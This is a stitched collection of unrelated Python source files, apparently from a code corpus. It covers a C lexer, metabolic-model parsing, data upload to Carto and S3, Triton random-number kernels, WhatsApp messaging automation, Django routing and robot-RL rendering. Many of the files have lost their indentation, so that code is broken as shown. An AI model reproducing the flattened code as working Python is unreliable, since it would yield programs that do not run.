'body.block_items': prog,
'decl.name': name,
'decl.coord': coord,
'decl.type.coord': coord,
'decl.type.type.coord': coord,
'decl.type.type.declname': name,
'decl.type.type.type.names': type_,
'decl.type.type.type.coord': coord
})
def read_ident(self):
coord = f'{self.input.filename}:{self.input.line}'
id_ = self.read_while(self.is_id)
type_ = str()
# print(f'id: {id_}')
if self.is_keyword(id_):
type_ = 'kw'
elif self.is_datatype(id_):
type_ = 'datatype'
self.direct_trans[f'{id_}*'] = f'{self.direct_trans[id_]}*'
maybe_pointer = self.read_while(lambda ch: ch in [' ', '*'])\
.replace(' ', str())
if maybe_pointer:
id_ += maybe_pointer
elif self.is_being_declared() and self.is_not_builtin(id_):
# print(f"creating var out of {id_}")
return populate_ast(self, 'id', **{
'name': id_,
'coord': coord
})
else:
# function definition
if self.tokens and self.tokens[-1].get('type') == 'datatype' and\
self.peek()['value'] == '(':
return self.read_function(id_, list())
# function call
if self.peek()['value'] == '(':
return populate_ast(self, 'funccall', **{
'coord': coord,
'name.name': self.direct_trans.get(id_, id_),
'name.coord': coord,
'args.coord': coord,
'args.exprs.coord': coord
})
# function/variable declaration
return populate_ast(self, 'decl', **{
'name': id_,
'coord': coord,
'type.declname': id_,
'type.coord': coord,
'type.type.names': list(),
'type.type.coord': coord,
'init.coord': coord
})
self.tokens.append({
'type': type_,
'value': self.direct_trans.get(id_, id_)
})
return self.tokens[-1]
def read_escaped(self, end):
escaped = False
string = str()
self.input.next()
while not self.input.eof():
ch = self.input.next()
if ch == end:
break
string += ch
# if escaped:
# string += ch
# escaped = False
# elif ch == '\\':
# escaped = True
# elif ch == end:
# break
# else:
# string += ch
return f'"{string}"'
def read_string(self):
self.tokens.append({
"_nodetype": "Constant",
"type": "string",
"value": self.read_escaped('"'),
"coord": "examples/math.c:3:16"
})
# print(f'found string: {self.tokens[-1]}')
# self.tokens.append({
# 'type': 'str',
# 'value': self.read_escaped('"')
# })
return self.tokens[-1]
def skip_comment(self):
self.read_while(lambda ch: ch != "\n")
self.input.next()
def read_next(self):
self.read_while(self.is_whitespace)
if self.input.eof():
return None
        ch = self.input.peek()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens[-1]
        if self.is_op_char(ch):
            op = self.read_while(self.is_op_char)
            if op.startswith('//'):
                # peek() yields one character at a time, so a '//' comment is
                # only visible after reading the whole operator run
                self.skip_comment()
                return self.read_next()
            self.tokens.append({
                'type': 'op',
                'value': op
            })
            return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def read_prev(self):
self.read_while_prev(self.is_whitespace)
if self.input.bof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
            return self.tokens[-1]
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def peek(self):
if self.current:
return self.current
self.current = self.read_next()
return self.current
def next(self):
tok = self.current
self.current = None
return tok or self.read_next()
def prev(self):
return self.read_prev()
def eof(self):
return self.peek() is None
|
117309
|
from collections import deque
d = deque()
N = int(input())
for _ in range(N):
cmd = input().split()
if cmd[0] == 'append':
d.append(cmd[1])
elif cmd[0] == 'appendleft':
d.appendleft(cmd[1])
elif cmd[0] == 'pop':
d.pop()
elif cmd[0] == 'popleft':
d.popleft()
print(' '.join(d))
|
117316
|
from daiquiri.core.utils import send_mail, get_admin_emails, get_permission_emails
def get_manager_emails():
return get_permission_emails((
'daiquiri_meetings.view_meeting',
'daiquiri_meetings.view_participant',
'daiquiri_meetings.view_contribution',
)) + get_admin_emails()
def send_registration_mails(request, meeting, participant, contribution=None):
    # sends an email to the managers once a participant has registered.
send_mail(request, 'meetings/email/notify_registration', {
'meeting': meeting,
'participant': participant,
'contribution': contribution
}, get_manager_emails())
    # sends an email to the participant once he/she has registered.
send_mail(request, 'meetings/email/registration', {
'meeting': meeting,
'participant': participant,
'contribution': contribution
}, [participant.email])
|
117372
|
import pandas as pd
import os
import sys
import datetime
utils_path = os.path.join(os.path.abspath(os.getenv('PROCESSING_DIR')),'utils')
if utils_path not in sys.path:
sys.path.append(utils_path)
import util_files
import util_cloud
import util_carto
import logging
from zipfile import ZipFile
import tabula
# Set up logging
# Get the top-level logger object
logger = logging.getLogger()
for handler in list(logger.handlers): logger.removeHandler(handler)
logger.setLevel(logging.INFO)
# make it print to the console.
console = logging.StreamHandler()
logger.addHandler(console)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# name of table on Carto where you want to upload data
# this should be a table name that is not currently in use
dataset_name = 'soc_067_rw1_climate_risk_index' #check
logger.info('Executing script for dataset: ' + dataset_name)
# create a new sub-directory within your specified dir called 'data'
# within this directory, create files to store raw and processed data
data_dir = util_files.prep_dirs(dataset_name)
'''
Download data and save to your data directory
'''
# insert the url used to download the pdf from the source website
url = 'https://germanwatch.org/sites/germanwatch.org/files/20-2-01e%20Global%20Climate%20Risk%20Index%202020_14.pdf'
# download the pdf from the url, scrape the tables that store the data,
# and combine them into a single pandas dataframe
df = pd.concat(tabula.read_pdf(url, pages=list(range(37, 41)), multiple_tables=True, lattice=True)[:-1])
# export the pandas dataframe to a csv file
raw_data_file = os.path.join(data_dir, 'data.csv')
df.to_csv(raw_data_file, index = False)
'''
Process data
'''
# rename the columns to get rid of spaces and special characters
# and convert them all to lowercase letters
df.rename(columns = {'CRI\rRank': 'cri_rank',
'Country': 'country',
'CRI\rscore': 'cri_score',
'Fatalities\rin 2018\r(Rank)': 'fatalities_2018_rank',
'Fatalities per\r100 000 inhab-\ritants (Rank)': 'fatalities_per_100k',
'Losses in mil-\rlion US$ (PPP)\r(Rank)': 'losses_usdm_ppp_rank',
'Losses per\runit GDP in\r% (Rank)': 'losses_per_gdp__rank'},
inplace = True)
# create a new column 'datetime' to store the time period of the data
# as the first date of the year
df['datetime'] = datetime.datetime(2018, 1, 1)
# save processed dataset to csv
processed_data_file = os.path.join(data_dir, dataset_name+'_edit.csv')
df.to_csv(processed_data_file, index=False)
'''
Upload processed data to Carto
'''
logger.info('Uploading processed data to Carto.')
util_carto.upload_to_carto(processed_data_file, 'LINK')
'''
Upload original data and processed data to Amazon S3 storage
'''
# initialize AWS variables
aws_bucket = 'wri-public-data'
s3_prefix = 'resourcewatch/'
logger.info('Uploading original data to S3.')
# Upload raw data file to S3
# Copy the raw data into a zipped file to upload to S3
raw_data_dir = os.path.join(data_dir, dataset_name+'.zip')
with ZipFile(raw_data_dir, 'w') as zipped:
    zipped.write(raw_data_file, os.path.basename(raw_data_file))
# Upload raw data file to S3
uploaded = util_cloud.aws_upload(raw_data_dir, aws_bucket, s3_prefix+os.path.basename(raw_data_dir))
logger.info('Uploading processed data to S3.')
# Copy the processed data into a zipped file to upload to S3
processed_data_dir = os.path.join(data_dir, dataset_name+'_edit.zip')
with ZipFile(processed_data_dir, 'w') as zipped:
    zipped.write(processed_data_file, os.path.basename(processed_data_file))
# Upload processed data file to S3
uploaded = util_cloud.aws_upload(processed_data_dir, aws_bucket, s3_prefix+os.path.basename(processed_data_dir))
|
117454
|
from __future__ import print_function
import click
import json
import os
import cobra
import re
from gsmodutils.utils import StringIO
class ParseError(Exception):
pass
def load_scrumpy_model(filepath_or_string, name=None, model_id=None, media=None, objective_reactions=None,
obj_dir='min', fixed_fluxes=None):
"""
Specify a base scrumpy structural model file and returns a cobra model.
This hasn't be thoroughly tested so expect there to be bugs
To get a solution from the returned object you need to specify nice stuff like the atpase reaction and media
:param filepath_or_string: filepath or scrumpy string
:param name:
:param model_id:
:param media:
:param objective_reactions:
:param obj_dir:
:param fixed_fluxes:
:return:
"""
if objective_reactions is None:
objective_reactions = ['Biomass']
if fixed_fluxes is not None:
assert isinstance(fixed_fluxes, dict)
if os.path.isfile(filepath_or_string):
rel_path = '/'.join(os.path.abspath(filepath_or_string).split('/')[:-1])
fp = os.path.abspath(filepath_or_string).split('/')[-1]
reactions, metabolites, externals = parse_file(fp, rel_path=rel_path)
else:
rel_path = '.'
reactions, metabolites, externals = parse_string(filepath_or_string, rel_path=rel_path)
model = cobra.Model()
for mid in metabolites:
        compartment = 'c'  # internal metabolites default to the cytosol
        if mid[:2] == "x_" or mid in externals:
            compartment = 'e'
        m = cobra.Metabolite(id=mid, compartment=compartment)  # ScrumPy itself does not use compartments
model.add_metabolites([m])
added_reactions = []
for reaction in reactions:
if reaction['id'] not in added_reactions:
r = cobra.Reaction(reaction['id'])
model.add_reactions([r])
r.lower_bound = reaction['bounds'][0]
r.upper_bound = reaction['bounds'][1]
r.add_metabolites(reaction['metabolites'])
added_reactions.append(reaction['id'])
# We need to add transporters for external metabolites not defined with the "External" directive
for metabolite in model.metabolites:
if metabolite.id[:2] == "x_":
r = cobra.Reaction("EX_{}".format(metabolite.id[2:]))
model.add_reactions([r])
r.lower_bound = -1000.0
r.upper_bound = 1000.0
r.add_metabolites({
metabolite.id: -1.0
})
added_reactions.append(r.id)
if media is not None:
for ex_reaction in model.exchanges:
ex_reaction.lower_bound = media.get(ex_reaction.id, 0)
if fixed_fluxes is not None:
for rid, flux in fixed_fluxes.items():
try:
reaction = model.reactions.get_by_id(rid)
reaction.lower_bound = flux
reaction.upper_bound = flux
except KeyError:
click.echo('Error setting fixed flux for reaction id {}, not found'.format(rid))
for oreact in objective_reactions:
try:
objreac = model.reactions.get_by_id(oreact)
objreac.objective_coefficient = 1.0
except KeyError:
print('Error setting objective, reaction name {} not found'.format(oreact))
model.objective.direction = obj_dir
model.id = model_id
model.name = name
return model
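# Minimal usage sketch (hypothetical file, media and reaction names):
# model = load_scrumpy_model('model.spy', media={'GLC_tx': -10.0},
#                            objective_reactions=['Biomass'], obj_dir='max')
# solution = model.optimize()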
def get_tokens(line):
"""
    Goes through each character in a ScrumPy file line attempting to find tokens.
    FIXME: if there is a numeric directly after a direction token this fails,
    e.g. '->2 "PROTON"' fails but '-> 2 "PROTON"' works
    :param line:
    :return:
"""
line_dt = line.strip().split('#')[0]
tokens = []
quoted = False
tk_str = ""
line_dt = line_dt.replace("->", "-> ")
line_dt = line_dt.replace("<-", "<- ")
line_dt = line_dt.replace("<>", "<> ")
for ch in line_dt:
if ch in ['"', "'"]:
if not quoted:
quoted = True
if len(tk_str) and ch != " ":
tokens.append(tk_str)
tk_str = ch
elif tk_str[0] == ch:
tk_str += ch
tokens.append(tk_str)
tk_str = ""
quoted = False
else:
tk_str += ch
elif ch in ["(", ")", ":", ",", " "] and not quoted:
if len(tk_str):
tokens.append(tk_str)
tk_str = ""
if ch != " ":
tokens.append(ch)
else:
tk_str += ch
if len(tk_str):
tokens.append(tk_str)
return tokens
def parse_file(filepath, fp_stack=None, rel_path=''):
"""
Recursive function - takes in a scrumpy spy file and parses it, returning a set of reactions
Note this code is not fully tested. Expect some bugs.
:param filepath:
:param fp_stack:
:param rel_path:
:return:
"""
if fp_stack is None:
fp_stack = [filepath]
else:
fp_stack.append(filepath)
with open(os.path.join(rel_path, filepath)) as infile:
reactions, metabolites, externals = parse_fobj(infile, fp_stack, rel_path, filepath)
return reactions, metabolites, externals
def parse_string(spy_string, rel_path='.'):
with StringIO() as fstr:
fstr.write(spy_string)
fstr.seek(0)
reactions, metabolites, externals = parse_fobj(fstr, [], rel_path, "scrumpy_string")
return reactions, metabolites, externals
def parse_fobj(infile, fp_stack, rel_path, source_name):
    num_match = re.compile(r"[0-9]+/[0-9]+")
reactions = []
metabolites = []
externals = []
in_include = False
in_external = False
in_reaction = False
s_coef = -1
si = 1.0
for linecount, line in enumerate(infile):
# Ignore anything after comments
tokens = get_tokens(line)
prev_token = ''
# print tokens
for token in tokens:
if in_reaction:
if token == '~':
in_reaction = False
s_coef = -1
reactions.append(reaction)
elif token in ["<-", "<>", "->"]:
s_coef = 1
if token == "<-":
reaction['bounds'] = [-1000.0, 0.0]
elif token == "->":
reaction['bounds'] = [0.0, 1000.0]
else:
reaction['bounds'] = [-1000.0, 1000.0]
elif token == "+":
pass
else:
try:
si = float(token)
except ValueError:
                        if num_match.match(token):
                            # fractional stoichiometry such as '1/2'
                            num, den = token.split('/')
                            si = float(num) / float(den)
elif len(token.strip()):
metab = token.replace('"', '').replace("'", '')
metabolites.append(metab)
# not a stoichiometric value
reaction['metabolites'][metab] = s_coef * si
si = 1.0
prev_token = token
continue
if in_external:
if token in [',', '(']:
continue
elif token == ')':
in_external = False
else:
token = token.replace('"', '')
metabolites.append(token)
externals.append(token)
rs = dict(
id='{}_tx'.format(token),
metabolites={token: -1.0},
source=source_name,
bounds=[-1000.0, 1000.0]
)
reactions.append(rs)
continue
if in_include:
if token in [',', '(']:
continue
elif token == ')':
in_include = False
elif token in fp_stack:
raise ParseError('Cyclic dependency for file {}'.format(token))
else:
rset, mset, exset = parse_file(token, fp_stack, rel_path)
reactions += rset
metabolites += mset
externals += exset
continue
if token == 'External':
in_external = True
elif token == 'Include':
in_include = True
elif token == ":":
in_reaction = True
s_coef = -1
reaction = dict(
source=source_name,
metabolites={},
id=prev_token.replace('"', '').replace("'", ""),
line=linecount,
)
prev_token = token
return reactions, metabolites, externals
@click.command()
@click.argument('model')
@click.argument('model_id')
@click.option('--name', default=None, help='Specify a name for this model')
@click.option('--output', default='omodel.json', help='output location for json file')
@click.option('--media', default=None, type=str, help='A growth media constraints file')
@click.option('--fixed_fluxes', default=None, help='Path to a json dictionary containing biomass composition')
@click.option('--objective', default='Biomass', help='Objective reaction id')
@click.option('--objective_direction', default='min', help='objective direction (min or max)')
def scrumpy_to_cobra(model, model_id, name, output, media, fixed_fluxes, objective,
objective_direction):
"""
Command line utility for parsing scrumpy files and creating cobrapy models
By default, models use the minimisation of flux objective function approach, though if a lumped biomass reaction
is present, this can be specified as a maximisation objective.
For the minimisation of fluxes approach a biomass composition should be specified.
This should be a json file of fixed biomass transporter reaction identifiers and their associated flux value.
If the lumped biomass reaction is used the media composition will be required for growth.
These values are the lower bounds for the fluxes on uptake reactions.
"""
if fixed_fluxes is not None and os.path.exists(fixed_fluxes):
with open(fixed_fluxes) as mp:
fixed_fluxes = json.load(mp)
else:
fixed_fluxes = None
if media is not None and os.path.exists(media):
with open(media) as mp:
media = json.load(mp)
else:
media = None
model = load_scrumpy_model(model,
media=media,
objective_reactions=[objective],
obj_dir=objective_direction,
fixed_fluxes=fixed_fluxes,
name=name,
model_id=model_id
)
cobra.io.save_json_model(model, output)
|
117513
|
import numpy as np
import json
from PIL import Image
from pathlib import Path
import argparse
import os
def crop_images_bbox(input_dir,output_dir,anno_path, double_path = False):
with open(anno_path) as f:
anno = json.load(f)
imageid2filename = {}
for item in anno['images']:
imageid2filename[item['id']] = item['file_name']
label2conceptname = {}
for item in anno['categories']:
name = item['name'].replace(' ','_')
label2conceptname[item['id']] = name
        if double_path:
(output_dir/name/name).mkdir(parents=True, exist_ok = True)
else:
(output_dir/name).mkdir(parents=True, exist_ok = True)
for item in anno['annotations']:
bbox = item['bbox']
if bbox[2] < 30 or bbox[3] < 30:
continue
bbox[2] += bbox[0]
bbox[3] += bbox[1]
img = Image.open(input_dir / imageid2filename[item['image_id']])
img_cropped = img.crop(bbox)
concept_name = label2conceptname[item['category_id']]
        if double_path:
img_cropped.save(output_dir / f"{concept_name}/{concept_name}/{item['id']}.jpg")
else:
img_cropped.save(output_dir / f"{concept_name}/{item['id']}.jpg")
return
parser = argparse.ArgumentParser('Cropping COCO images with bounding boxes')
parser.add_argument('-coco-path', type=str, default = 'data/coco')
parser.add_argument('-concept-path', type=str, default = 'data_256')
args = parser.parse_args()
print(args)
coco_path = Path(args.coco_path)
train_dir = coco_path / 'train2017'
val_dir = coco_path / 'val2017'
train_anno_path = coco_path / 'annotations/instances_train2017.json'
val_anno_path = coco_path / 'annotations/instances_val2017.json'
concept_path = Path(args.concept_path)
concept_path.mkdir(parents=True, exist_ok = True)
concept_train_dir = concept_path / 'concept_train'
concept_train_dir.mkdir(parents=True, exist_ok = True)
concept_val_dir = concept_path / 'concept_test'
concept_val_dir.mkdir(parents=True, exist_ok = True)
crop_images_bbox(val_dir, concept_val_dir, val_anno_path)
crop_images_bbox(train_dir, concept_train_dir, train_anno_path, double_path=True)
|
117524
|
import enum
class AssetType(enum.Enum):
algo = enum.auto()
aggregate_algo = enum.auto()
aggregatetuple = enum.auto()
composite_algo = enum.auto()
composite_traintuple = enum.auto()
data_sample = enum.auto()
dataset = enum.auto()
objective = enum.auto()
node = enum.auto()
testtuple = enum.auto()
traintuple = enum.auto()
compute_plan = enum.auto()
@classmethod
def all(cls):
return [e for e in cls]
@classmethod
def can_be_get(cls):
gettable = cls.all()
gettable.remove(cls.data_sample)
gettable.remove(cls.node)
return gettable
@classmethod
def can_be_listed(cls):
return cls.all()
|
117541
|
import triton
from . import core as tl
PHILOX_KEY_A: tl.constexpr = -1640531527 # 0x9E3779B9
PHILOX_KEY_B: tl.constexpr = -1150833019 # 0xBB67AE85
PHILOX_ROUND_A: tl.constexpr = -766435501 # 0xD2511F53
PHILOX_ROUND_B: tl.constexpr = -845247145 # 0xCD9E8D57
N_ROUNDS_DEFAULT = 10 # Default number of rounds for philox
# -------------------
# randint
# -------------------
@triton.jit
def philox_impl(c0, c1, c2, c3, k0, k1, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Run `n_rounds` rounds of Philox for state (c0, c1, c2, c3) and key (k0, k1).
"""
for _ in range(n_rounds):
# update random state
A = PHILOX_ROUND_A
B = PHILOX_ROUND_B
_c0, _c2 = c0, c2
c0 = tl.umulhi(B, _c2) ^ c1 ^ k0
c2 = tl.umulhi(A, _c0) ^ c3 ^ k1
c1 = B * _c2
c3 = A * _c0
# raise key
k0 = k0 + PHILOX_KEY_A
k1 = k1 + PHILOX_KEY_B
return c0, c1, c2, c3
@triton.jit
def philox(seed, c0, c1, c2, c3, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
seed = seed.to(tl.uint64)
seed_hi = ((seed >> 32) & 0xffffffff).to(tl.uint32)
seed_lo = (seed & 0xffffffff).to(tl.uint32)
return philox_impl(c0, c1, c2, c3, seed_lo, seed_hi, n_rounds)
@triton.jit
def randint(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns a single
block of random :code:`int32`.
If you need multiple streams of random numbers,
using `randint4x` is likely to be faster than calling `randint` 4 times.
:param seed: The seed for generating random numbers.
    :param offset: The offset block to generate random numbers for.
"""
ret, _, _, _ = randint4x(seed, offset, n_rounds)
return ret
@triton.jit
def randint4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns four
blocks of random :code:`int32`.
This is the maximally efficient entry point
to Triton's Philox pseudo-random number generator.
:param seed: The seed for generating random numbers.
    :param offset: The offset block to generate random numbers for.
"""
# _0 = tl.zeros(offset.shape, offset.dtype)
_0 = offset * 0
return philox(seed, offset, _0, _0, _0, n_rounds)
# -------------------
# rand
# -------------------
# @triton.jit
# def uint32_to_uniform_float(x):
# """
# Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
# """
# two_to_the_minus_32: tl.constexpr = 2.328306e-10
# return x * two_to_the_minus_32
@triton.jit
def uint32_to_uniform_float(x):
"""
Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
"""
x = x.to(tl.int32, bitcast=True)
max = 4.656613e-10 # = 1/MAX_INT = 1/2147483647.
x = tl.where(x < 0, -x - 1, x)
return x * max
@triton.jit
def rand(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
    :param offset: The offset block to generate random numbers for.
"""
offset = offset.to(tl.uint32, bitcast=True)
source = randint(seed, offset, n_rounds)
return uint32_to_uniform_float(source)
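# Minimal usage sketch (hypothetical kernel, not part of this module): using
# `rand` inside a Triton kernel for dropout-style masking with keep probability 0.5.
# @triton.jit
# def _dropout(x_ptr, out_ptr, seed, n, BLOCK: tl.constexpr):
#     offs = tl.program_id(0) * BLOCK + tl.arange(0, BLOCK)
#     mask = offs < n
#     r = rand(seed, offs)  # one float32 in [0, 1) per offset
#     x = tl.load(x_ptr + offs, mask=mask)
#     tl.store(out_ptr + offs, tl.where(r > 0.5, x / 0.5, 0.0), mask=mask)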
@triton.jit
def rand4x(seed, offsets, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offsets` block,
    returns 4 blocks of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offsets = offsets.to(tl.uint32, bitcast=True)
i1, i2, i3, i4 = randint4x(seed, offsets, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
u3 = uint32_to_uniform_float(i3)
u4 = uint32_to_uniform_float(i4)
return u1, u2, u3, u4
# -------------------
# randn
# -------------------
@triton.jit
def pair_uniform_to_normal(u1, u2):
"""Box-Muller transform"""
u1 = tl.maximum(1.0e-7, u1)
th = 6.283185307179586 * u2
r = tl.sqrt(-2.0 * tl.log(u1))
return r * tl.cos(th), r * tl.sin(th)
@triton.jit
def randn(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
    :param offset: The offset block to generate random numbers for.
"""
i1, i2, _, _ = randint4x(seed, offset, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
n1, _ = pair_uniform_to_normal(u1, u2)
return n1
@triton.jit
def randn4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
    returns 4 blocks of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
    :param seed: The seed for generating random numbers.
    :param offset: The offset block to generate random numbers for.
"""
u1, u2, u3, u4 = rand4x(seed, offset, n_rounds)
n1, n2 = pair_uniform_to_normal(u1, u2)
n3, n4 = pair_uniform_to_normal(u3, u4)
return n1, n2, n3, n4
|
117555
|
from src.base.tile import Tile
class TileLoader:
def __init__(self, bbox=None, image_api=None):
self.bbox = bbox
self.image_api = image_api
self.tile = None
def load_tile(self):
image = self.image_api.get_image(self.bbox)
self.tile = Tile(image, self.bbox)
return self.tile
|
117577
|
import os
api_base = os.environ.get('GENOMELINK_API_BASE', 'https://genomelink.io')
from genomelink.oauth import OAuth
from genomelink.resource.report import Report
|
117619
|
def start():
    driverType = irr.driverChoiceConsole()
    if driverType == irr.EDT_COUNT:
        return 1
    device = irr.createDevice(driverType, irr.dimension2d_u32(640, 480))
    if device is None:
        return 1
    driver = device.getVideoDriver()
    smgr = device.getSceneManager()
    device.getFileSystem().addZipFileArchive("../../media/map-20kdm2.pk3")
    mesh = smgr.getMesh("20kdm2.bsp")
    node = None
    if mesh is not None:
        node = smgr.addOctreeSceneNode(mesh.getMesh(0), None, -1, 1024)
    if node is not None:
        node.setPosition(irr.vector3df(-1300, -144, -1249))
    smgr.addCameraSceneNodeFPS()
    device.getCursorControl().setVisible(False)
    lastFPS = -1
    while device.run():
        if device.isWindowActive():
            driver.beginScene(True, True, irr.SColor(255, 200, 200, 200))
            smgr.drawAll()
            driver.endScene()
            fps = driver.getFPS()
            if lastFPS != fps:
                tmp = "cpgf Irrlicht Python Binding Demo - Quake 3 Map example ["
                tmp = tmp + driver.getName()
                tmp = tmp + "] fps: "
                tmp = tmp + str(fps)
                device.setWindowCaption(tmp)
                lastFPS = fps
    device.drop()
    return 0
start()
|
117627
|
import pywhatkit as py
import keyboard
import time
from datetime import datetime, timedelta
def sendMessage(numbers, message, price):
    for number in numbers:
        # schedule the message two minutes from now; using timedelta avoids
        # the minute arithmetic overflowing past 59
        send_time = datetime.now() + timedelta(minutes=2)
        py.sendwhatmsg(number, "{}: {:.10f}".format(message, price), send_time.hour,
                       send_time.minute)
        keyboard.press_and_release('ctrl+w')
        time.sleep(1)
        keyboard.press_and_release('enter')
        time.sleep(1)
|
117637
|
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.views.generic import TemplateView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^account/', include("accounts.urls", namespace = 'account')),
url(r'^reports/', include("reports.urls", namespace = 'reports')),
url(r'^sales/', include("sales.urls", namespace = 'sales')),
url(r'^purchase/', include("purchase.urls", namespace = 'purchase')),
url(r'^item/', include("item_master.urls", namespace = 'item')),
url(r'^company/', include("company_master.urls", namespace = 'company')),
url(r'^salt/', include("salt_master.urls", namespace = 'salt')),
url(r'^godown/', include("godown_master.urls", namespace = 'godown')),
url(r'^unit/', include("unit_master.urls", namespace = 'unit')),
url(r'^', include("home.urls", namespace = 'home')),
]
|
117655
|
import numpy as np
import torch
import time
import gym
from a2c_ppo_acktr import utils
from a2c_ppo_acktr.envs import make_vec_envs
from common.common import *
import pyrobotdesign as rd
def evaluate(args, actor_critic, ob_rms, env_name, seed, num_processes, device):
eval_envs = make_vec_envs(env_name, seed + num_processes, num_processes,
None, None, device, True)
vec_norm = utils.get_vec_normalize(eval_envs)
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
eval_episode_rewards = []
obs = eval_envs.reset()
eval_recurrent_hidden_states = torch.zeros(
num_processes, actor_critic.recurrent_hidden_state_size, device=device)
eval_masks = torch.zeros(num_processes, 1, device=device)
while len(eval_episode_rewards) < args.eval_num:
with torch.no_grad():
_, action, _, eval_recurrent_hidden_states = actor_critic.act(
obs,
eval_recurrent_hidden_states,
eval_masks,
deterministic=True)
        # Observe reward and next obs
obs, _, done, infos = eval_envs.step(action)
eval_masks = torch.tensor(
[[0.0] if done_ else [1.0] for done_ in done],
dtype=torch.float64,
device=device)
for info in infos:
if 'episode' in info.keys():
eval_episode_rewards.append(info['episode']['r'])
eval_envs.close()
print(" Evaluation using {} episodes: mean reward {:.5f}\n".format(
len(eval_episode_rewards), np.mean(eval_episode_rewards)))
def render(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step * render_env.frame_skip
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while not done:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 5.0 * time_step * (target_pos - camera_pos)
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
# render each sub-step
def render_full(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step
control_frequency = render_env.frame_skip
render_env.set_frame_skip(1)
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while episode_length < 128 * control_frequency:
if episode_length % control_frequency == 0:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 20.0 * time_step * (target_pos - camera_pos)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
if sim_time + time_step > render_time_now - render_time_start:
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
